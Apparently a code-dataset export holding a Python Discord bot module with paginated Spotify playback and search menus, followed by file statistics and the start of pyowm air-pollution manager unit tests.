def __init__(self, items: List[tekore.model.FullShow], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, show: tekore.model.FullShow
) -> discord.Embed:
self.current_track = show
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/show/{show.id}"
artist_title = f"{show.name} by {show.publisher}"
em.set_author(
name=artist_title[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{show.description[:1900]}]({url})\n"
if show.images:
em.set_thumbnail(url=show.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyRecentSongPages(menus.ListPageSource):
def __init__(self, tracks: List[tekore.model.PlayHistory], detailed: bool):
super().__init__(tracks, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, history: tekore.model.PlayHistory
) -> discord.Embed:
track = history.track
self.current_track = track
em = None
em = discord.Embed(color=discord.Colour(0x1DB954), timestamp=history.played_at)
url = f"https://open.spotify.com/track/{track.id}"
artist_title = f"{track.name} by " + ", ".join(a.name for a in track.artists)
em.set_author(
name=track.name[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{artist_title}]({url})\n"
if track.album.images:
em.set_thumbnail(url=track.album.images[0].url)
if self.detailed:
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
details = await sp.track_audio_features(history.track.id)
msg = await make_details(track, details)
em.add_field(name="Details", value=box(msg[:1000], lang="css"))
em.set_footer(
text=f"Page {menu.current_page + 1}/{self.get_max_pages()} | Played at",
)
return em
class SpotifyPlaylistsPages(menus.ListPageSource):
def __init__(self, playlists: List[tekore.model.SimplePlaylist]):
super().__init__(playlists, per_page=10)
async def format_page(
self, menu: menus.MenuPages, playlists: List[tekore.model.SimplePlaylist]
) -> discord.Embed:
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
em.set_author(
name=f"{menu.ctx.author.display_name}" + _("'s Spotify Playlists"),
icon_url=menu.ctx.author.avatar_url,
)
msg = ""
for playlist in playlists:
if playlist.public:
msg += f"[{playlist.name}](https://open.spotify.com/playlist/{playlist.id})\n"
else:
msg += f"{playlist.name}\n"
em.description = msg
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=SPOTIFY_LOGO,
)
return em
class SpotifyTopTracksPages(menus.ListPageSource):
def __init__(self, playlists: List[tekore.model.FullTrack]):
super().__init__(playlists, per_page=10)
async def format_page(
self, menu: menus.MenuPages, tracks: List[tekore.model.FullTrack]
) -> discord.Embed:
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
em.set_author(
name=f"{menu.ctx.author.display_name}" + _("'s Top Tracks"),
icon_url=menu.ctx.author.avatar_url,
)
msg = ""
for track in tracks:
artist = humanize_list([a.name for a in track.artists])
msg += f"[{track.name} by {artist}](https://open.spotify.com/track/{track.id})\n"
em.description = msg
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=SPOTIFY_LOGO,
)
return em
class SpotifyTopArtistsPages(menus.ListPageSource):
def __init__(self, playlists: List[tekore.model.FullArtist]):
super().__init__(playlists, per_page=10)
async def format_page(
self, menu: menus.MenuPages, artists: List[tekore.model.FullArtist]
) -> discord.Embed:
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
em.set_author(
name=f"{menu.ctx.author.display_name}" + _("'s Top Artists"),
icon_url=menu.ctx.author.avatar_url,
)
msg = ""
for artist in artists:
msg += f"[{artist.name}](https://open.spotify.com/artist/{artist.id})\n"
em.description = msg
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=SPOTIFY_LOGO,
)
return em
class SpotifyPages(menus.PageSource):
def __init__(self, user_token: tekore.Token, sender: tekore.AsyncSender, detailed: bool):
super().__init__()
self.user_token = user_token
self.sender = sender
self.detailed = detailed
self.current_track = None
async def format_page(
self,
menu: menus.MenuPages,
cur_state: Tuple[tekore.model.CurrentlyPlayingContext, bool],
) -> discord.Embed:
state = cur_state[0]
is_liked = cur_state[1]
em = discord.Embed(color=discord.Colour(0x1DB954))
self.current_track = state.item
if state.item.is_local:
url = "https://open.spotify.com/"
artist_title = f"{state.item.name} by " + ", ".join(a.name for a in state.item.artists)
image = SPOTIFY_LOGO
elif state.item.type == "episode":
url = f"https://open.spotify.com/episode/{state.item.id}"
artist_title = state.item.name
image = state.item.images[0].url
else:
url = f"https://open.spotify.com/track/{state.item.id}"
artist_title = f"{state.item.name} by " + ", ".join(a.name for a in state.item.artists)
image = state.item.album.images[0].url
album = getattr(state.item, "album", "")
if album:
album = f"[{album.name}](https://open.spotify.com/album/{album.id})"
em.set_author(
name=f"{menu.ctx.author.display_name}" + _(" is currently listening to"),
icon_url=menu.ctx.author.avatar_url,
url=url,
)
repeat = (
f"Repeat: {REPEAT_STATES[state.repeat_state]} |" if state.repeat_state != "off" else ""
)
shuffle = "Shuffle: \N{TWISTED RIGHTWARDS ARROWS} |" if state.shuffle_state else ""
liked = "Liked: \N{HEAVY BLACK HEART}\N{VARIATION SELECTOR-16}" if is_liked else ""
footer = f"{repeat}{shuffle}{liked}"
em.set_footer(text=footer, icon_url=SPOTIFY_LOGO)
em.description = f"[{artist_title}]({url})\n\n{album}\n{_draw_play(state)}"
try:
if self.detailed and not state.item.is_local:
sp = tekore.Spotify(sender=self.sender)
with sp.token_as(self.user_token):
details = await sp.track_audio_features(state.item.id)
msg = await make_details(state.item, details)
em.add_field(name="Details", value=box(msg[:1000], lang="css"))
except tekore.NotFound:
pass
em.set_thumbnail(url=image)
return em
def is_paginating(self):
"""An abstract method that notifies the :class:`MenuPages` whether or not
to start paginating. This signals whether to add reactions or not.
Subclasses must implement this.
Returns
--------
:class:`bool`
Whether to trigger pagination.
"""
return True
def get_max_pages(self):
"""An optional abstract method that retrieves the maximum number of pages
this page source has. Useful for UX purposes.
The default implementation returns ``None``.
Returns
--------
Optional[:class:`int`]
The maximum number of pages required to properly
paginate the elements, if given.
"""
return None
async def get_page(self, page_number):
"""|coro|
An abstract method that retrieves an object representing the object to format.
Subclasses must implement this.
.. note::
The page_number is zero-indexed between [0, :meth:`get_max_pages`),
if there is a maximum number of pages.
Parameters
-----------
page_number: :class:`int`
The page number to access.
Returns
---------
Any
The object represented by that page.
This is passed into :meth:`format_page`.
"""
try:
user_spotify = tekore.Spotify(sender=self.sender)
with user_spotify.token_as(self.user_token):
cur_state = await user_spotify.playback()
if not cur_state:
raise NotPlaying
is_liked = False
if not cur_state.item.is_local:
song = cur_state.item.id
liked = await user_spotify.saved_tracks_contains([song])
is_liked = liked[0]
except tekore.Unauthorised:
raise
return cur_state, is_liked
class SpotifyUserMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
cog: commands.Cog,
user_token: tekore.Token,
clear_reactions_after: bool = True,
delete_message_after: bool = False,
timeout: int = 60,
message: discord.Message = None,
**kwargs: Any,
) -> None:
super().__init__(
source,
clear_reactions_after=clear_reactions_after,
delete_message_after=delete_message_after,
timeout=timeout,
message=message,
**kwargs,
)
self.user_token = user_token
self.cog = cog
self.add_button(
menus.Button(emoji_handler.get_emoji("next"), self.skip_next, position=menus.First(2))
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("previous"), self.skip_previous, position=menus.First(0)
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("playpause"), self.play_pause, position=menus.First(1)
)
)
self.add_button(
menus.Button(emoji_handler.get_emoji("repeat"), self.repeat, position=menus.First(3))
)
self.add_button(
menus.Button(emoji_handler.get_emoji("shuffle"), self.shuffle, position=menus.First(4))
)
self.add_button(
menus.Button(emoji_handler.get_emoji("like"), self.like_song, position=menus.First(5))
)
async def update(self, payload):
"""|coro|
Updates the menu after an event has been received.
Parameters
-----------
payload: :class:`discord.RawReactionActionEvent`
The reaction event that triggered this update.
"""
button = self.buttons[payload.emoji]
if not self._running:
return
try:
if button.lock:
async with self._lock:
if self._running:
await button(self, payload)
else:
await button(self, payload)
except Exception as exc:
log.debug("Ignored exception on reaction event", exc_info=exc)
async def send_initial_message(self, ctx, channel):
"""|coro|
The default implementation of :meth:`Menu.send_initial_message`
for the interactive pagination session.
This implementation shows the first page of the source.
"""
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
msg = await channel.send(**kwargs)
self.cog.current_menus[msg.id] = ctx.author.id
return msg
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
await self.message.edit(**kwargs)
async def show_checked_page(self, page_number: int) -> None:
max_pages = self._source.get_max_pages()
try:
if max_pages is None:
# If it doesn't give maximum pages, it cannot be checked
await self.show_page(page_number)
elif page_number >= max_pages:
await self.show_page(0)
elif page_number < 0:
await self.show_page(max_pages - 1)
elif max_pages > page_number >= 0:
await self.show_page(page_number)
except IndexError:
# An error happened that can be handled, so ignore it.
pass
def reaction_check(self, payload):
"""Just extends the default reaction_check to use owner_ids"""
if payload.message_id != self.message.id:
return False
if payload.user_id != self._author_id:
return False
return payload.emoji in self.buttons
def _skip_single_arrows(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages == 1
def _skip_double_triangle_buttons(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages <= 2
async def play_pause(self, payload):
"""go to the previous page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
if cur.is_playing:
await user_spotify.playback_pause()
else:
await user_spotify.playback_resume()
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_checked_page(0)
async def repeat(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if cur.repeat_state == "off":
state = "context"
if cur.repeat_state == "context":
state = "track"
if cur.repeat_state == "track":
state = "off"
await user_spotify.playback_repeat(state)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_checked_page(0)
async def shuffle(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
state = not cur.shuffle_state
await user_spotify.playback_shuffle(state)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_checked_page(0)
async def like_song(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
await user_spotify.saved_tracks_add([self.source.current_track.id])
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await self.show_checked_page(0)
async def skip_previous(self, payload):
"""go to the first page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
await user_spotify.playback_previous()
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_page(0)
async def skip_next(self, payload):
"""go to the last page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
await user_spotify.playback_next()
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_page(0)
@menus.button("\N{CROSS MARK}")
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
"""stops the pagination session."""
self.stop()
del self.cog.current_menus[self.message.id]
await self.message.delete()
class SpotifySearchMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
cog: commands.Cog,
user_token: tekore.Token,
clear_reactions_after: bool = True,
delete_message_after: bool = False,
timeout: int = 60,
message: discord.Message = None,
**kwargs: Any,
) -> None:
super().__init__(
source,
clear_reactions_after=clear_reactions_after,
delete_message_after=delete_message_after,
timeout=timeout,
message=message,
**kwargs,
)
self.user_token = user_token
self.cog = cog
self.add_button(
menus.Button(emoji_handler.get_emoji("next"), self.skip_next, position=menus.First(6))
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("previous"), self.skip_previous, position=menus.First(0)
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("playpause"), self.play_pause, position=menus.First(2)
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("playall"),
self.play_pause_all,
position=menus.First(3),
skip_if=self._skip_play_all,
)
)
self.add_button(
menus.Button(emoji_handler.get_emoji("like"), self.like_song, position=menus.First(4))
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("back_left"),
self.go_to_previous_page,
position=menus.First(1),
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("play"), self.go_to_next_page, position=menus.First(5)
)
)
async def update(self, payload):
"""|coro|
Updates the menu after an event has been received.
Parameters
-----------
payload: :class:`discord.RawReactionActionEvent`
The reaction event that triggered this update.
"""
button = self.buttons[payload.emoji]
if not self._running:
return
try:
if button.lock:
async with self._lock:
if self._running:
await button(self, payload)
else:
await button(self, payload)
except Exception as exc:
log.debug("Ignored exception on reaction event", exc_info=exc)
async def send_initial_message(self, ctx, channel):
"""|coro|
The default implementation of :meth:`Menu.send_initial_message`
for the interactive pagination session.
This implementation shows the first page of the source.
"""
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
msg = await channel.send(**kwargs)
self.cog.current_menus[msg.id] = ctx.author.id
return msg
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
await self.message.edit(**kwargs)
async def show_checked_page(self, page_number: int) -> None:
max_pages = self._source.get_max_pages()
try:
if max_pages is None:
# If it doesn't give maximum pages, it cannot be checked
await self.show_page(page_number)
elif page_number >= max_pages:
await self.show_page(0)
elif page_number < 0:
await self.show_page(max_pages - 1)
elif max_pages > page_number >= 0:
await self.show_page(page_number)
except IndexError:
# An error happened that can be handled, so ignore it.
pass
def reaction_check(self, payload):
"""Just extends the default reaction_check to use owner_ids"""
if payload.message_id != self.message.id:
return False
if payload.user_id != self._author_id:
return False
return payload.emoji in self.buttons
def _skip_single_arrows(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages == 1
def _skip_double_triangle_buttons(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages <= 2
def _skip_play_all(self):
if isinstance(self._source.entries[0], tekore.model.FullTrack):
return False
return True
async def go_to_previous_page(self, payload):
"""go to the previous page"""
await self.show_checked_page(self.current_page - 1)
async def go_to_next_page(self, payload):
"""go to the next page"""
await self.show_checked_page(self.current_page + 1)
async def play_pause(self, payload):
"""go to the previous page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
return
if cur.item.id == self.source.current_track.id:
if cur.is_playing:
await user_spotify.playback_pause()
else:
await user_spotify.playback_resume()
else:
if self.source.current_track.type == "track":
await user_spotify.playback_start_tracks([self.source.current_track.id])
else:
await user_spotify.playback_start_context(self.source.current_track.uri)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
async def play_pause_all(self, payload):
"""go to the previous page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await ctx.send(_("I could not find an active device to send requests for."))
return
else:
if self.source.current_track.type == "track":
await user_spotify.playback_start_tracks(
[i.id for i in self.source.entries]
)
else:
await user_spotify.playback_start_context(self.source.current_track.uri)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
async def like_song(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
await user_spotify.saved_tracks_add([self.source.current_track.id])
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await self.show_checked_page(0)
async def skip_previous(self, payload):
"""go to the first page"""
await self.show_page(0)
async def skip_next(self, payload):
"""go to the last page"""
# The call here is safe because it's guarded by skip_if
await self.show_page(self._source.get_max_pages() - 1)
@menus.button("\N{CROSS MARK}")
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
"""stops the pagination session."""
self.stop()
del self.cog.current_menus[self.message.id]
await self.message.delete()
class SpotifyBaseMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
cog: commands.Cog,
user_token: tekore.Token,
clear_reactions_after: bool = True,
delete_message_after: bool = False,
timeout: int = 60,
message: discord.Message = None,
**kwargs: Any,
) -> None:
super().__init__(
source,
clear_reactions_after=clear_reactions_after,
delete_message_after=delete_message_after,
timeout=timeout,
message=message,
**kwargs,
)
self.user_token = user_token
self.cog = cog
async def update(self, payload):
"""|coro|
Updates the menu after an event has been received.
Parameters
-----------
payload: :class:`discord.RawReactionActionEvent`
The reaction event that triggered this update.
"""
button = self.buttons[payload.emoji]
if not self._running:
return
try:
if button.lock:
async with self._lock:
if self._running:
await button(self, payload)
else:
await button(self, payload)
except Exception as exc:
log.debug("Ignored exception on reaction event", exc_info=exc)
async def send_initial_message(self, ctx, channel):
"""|coro|
The default implementation of :meth:`Menu.send_initial_message`
for the interactive pagination session.
This implementation shows the first page of the source.
"""
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
msg = await channel.send(**kwargs)
self.cog.current_menus[msg.id] = ctx.author.id
return msg
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
await self.message.edit(**kwargs)
async def show_checked_page(self, page_number: int) -> None:
max_pages = self._source.get_max_pages()
try:
if max_pages is None:
# If it doesn't give maximum pages, it cannot be checked
await self.show_page(page_number)
elif page_number >= max_pages:
await self.show_page(0)
elif page_number < 0:
await self.show_page(max_pages - 1)
elif max_pages > page_number >= 0:
await self.show_page(page_number)
except IndexError:
# An error happened that can be handled, so ignore it.
pass
def reaction_check(self, payload):
"""Just extends the default reaction_check to use owner_ids"""
if payload.message_id != self.message.id:
return False
if payload.user_id not in (*self.bot.owner_ids, self._author_id):
return False
return payload.emoji in self.buttons
def _skip_single_arrows(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages == 1
def _skip_double_triangle_buttons(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages <= 2
@menus.button(
"\N{BLACK LEFT-POINTING TRIANGLE}\N{VARIATION SELECTOR-16}",
position=menus.First(1),
)
async def go_to_previous_page(self, payload):
"""go to the previous page"""
await self.show_checked_page(self.current_page - 1)
@menus.button(
"\N{BLACK RIGHT-POINTING TRIANGLE}\N{VARIATION SELECTOR-16}",
position=menus.Last(0),
)
async def go_to_next_page(self, payload):
"""go to the next page"""
await self.show_checked_page(self.current_page + 1)
@menus.button(
"\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\N{VARIATION SELECTOR-16}",
position=menus.First(0),
skip_if=_skip_double_triangle_buttons,
)
async def go_to_first_page(self, payload):
"""go to the first page"""
await self.show_page(0)
@menus.button(
"\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\N{VARIATION SELECTOR-16}",
position=menus.Last(1),
skip_if=_skip_double_triangle_buttons,
)
async def go_to_last_page(self, payload):
"""go to the last page"""
# The call here is safe because it's guarded by skip_if
await self.show_page(self._source.get_max_pages() - 1)
@menus.button("\N{CROSS MARK}")
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
"""stops the pagination session."""
self.stop()
del self.cog.current_menus[self.message.id]
await self.message.delete()
| 38.195458
| 112
| 0.590445
| 5,708
| 47,095
| 4.699369
| 0.070953
| 0.031539
| 0.021921
| 0.029228
| 0.841895
| 0.816247
| 0.809126
| 0.793282
| 0.782024
| 0.758015
| 0
| 0.006925
| 0.307039
| 47,095
| 1,232
| 113
| 38.226461
| 0.815015
| 0.027944
| 0
| 0.714286
| 0
| 0.002976
| 0.14378
| 0.016696
| 0
| 0
| 0.002223
| 0
| 0
| 1
| 0.03869
| false
| 0.003968
| 0.013889
| 0.007937
| 0.124008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d32c0d10ddfb9d1fcbf823e44895018a52266de4
| 15,769
|
py
|
Python
|
tests/unit/airpollutionapi30/test_airpollution_manager.py
|
Trendometrics/pyowm
|
ba1581c37a8c6a2e113a77670cc68fe2b4adeca6
|
[
"MIT"
] | 799
|
2015-01-03T12:07:57.000Z
|
2022-03-31T03:59:53.000Z
|
tests/unit/airpollutionapi30/test_airpollution_manager.py
|
Trendometrics/pyowm
|
ba1581c37a8c6a2e113a77670cc68fe2b4adeca6
|
[
"MIT"
] | 279
|
2015-02-12T16:11:43.000Z
|
2022-02-14T21:49:03.000Z
|
tests/unit/airpollutionapi30/test_airpollution_manager.py
|
Trendometrics/pyowm
|
ba1581c37a8c6a2e113a77670cc68fe2b4adeca6
|
[
"MIT"
] | 215
|
2015-01-06T19:07:11.000Z
|
2022-02-14T21:39:33.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import unittest
from pyowm.airpollutionapi30 import airpollution_client, airpollution_manager, coindex, so2index, ozone, no2index, airstatus
from pyowm.config import DEFAULT_CONFIG
from pyowm.constants import AIRPOLLUTION_API_VERSION
from pyowm.utils import timestamps
from tests.unit.airpollutionapi30.test_ozone import OZONE_JSON
from tests.unit.airpollutionapi30.test_coindex import COINDEX_JSON
from tests.unit.airpollutionapi30.test_no2index import NO2INDEX_JSON
from tests.unit.airpollutionapi30.test_so2index import SO2INDEX_JSON
from tests.unit.airpollutionapi30.test_airstatus import AIRSTATUS_JSON, AIRSTATUS_MULTIPLE_JSON
class TestAirPollutionManager(unittest.TestCase):
__test_instance = airpollution_manager.AirPollutionManager('fakeapikey', DEFAULT_CONFIG)
def mock_get_coi_returning_coindex_around_coords(self, params_dict):
return json.loads(COINDEX_JSON)
def mock_get_o3_returning_ozone_around_coords(self, params_dict):
return json.loads(OZONE_JSON)
def mock_get_no2_returning_no2index_around_coords(self, params_dict):
return json.loads(NO2INDEX_JSON)
def mock_get_air_pollution(self, params_dict):
return json.loads(AIRSTATUS_JSON)
def mock_get_forecast_air_pollution(self, params_dict):
return json.loads(AIRSTATUS_MULTIPLE_JSON)
def mock_get_historical_air_pollution(self, params_dict):
return json.loads(AIRSTATUS_MULTIPLE_JSON)
def mock_get_so2_returning_so2index_around_coords(self, params_dict):
return json.loads(SO2INDEX_JSON)
def test_instantiation_with_wrong_params(self):
self.assertRaises(AssertionError, airpollution_manager.AirPollutionManager, None, dict())
self.assertRaises(AssertionError, airpollution_manager.AirPollutionManager, 'apikey', None)
def test_get_uvindex_api_version(self):
result = self.__test_instance.airpollution_api_version()
self.assertIsInstance(result, tuple)
self.assertEqual(result, AIRPOLLUTION_API_VERSION)
def test_coindex_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_coi
airpollution_client.AirPollutionHttpClient.get_coi = \
self.mock_get_coi_returning_coindex_around_coords
result = self.__test_instance.coindex_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.coi = ref_to_original
self.assertTrue(isinstance(result, coindex.COIndex))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.co_samples)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_coi
airpollution_client.AirPollutionHttpClient.get_coi = \
self.mock_get_coi_returning_coindex_around_coords
result = self.__test_instance.coindex_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.coi = ref_to_original
self.assertTrue(isinstance(result, coindex.COIndex))
self.assertEqual('year', result.interval)
def test_coindex_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, 200, 2.5)
def test_ozone_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_o3
airpollution_client.AirPollutionHttpClient.get_o3 = \
self.mock_get_o3_returning_ozone_around_coords
result = self.__test_instance.ozone_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.o3 = ref_to_original
self.assertTrue(isinstance(result, ozone.Ozone))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.du_value)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_o3
airpollution_client.AirPollutionHttpClient.get_o3 = \
self.mock_get_o3_returning_ozone_around_coords
result = self.__test_instance.ozone_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.o3 = ref_to_original
self.assertTrue(isinstance(result, ozone.Ozone))
self.assertEqual('year', result.interval)
def test_ozone_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
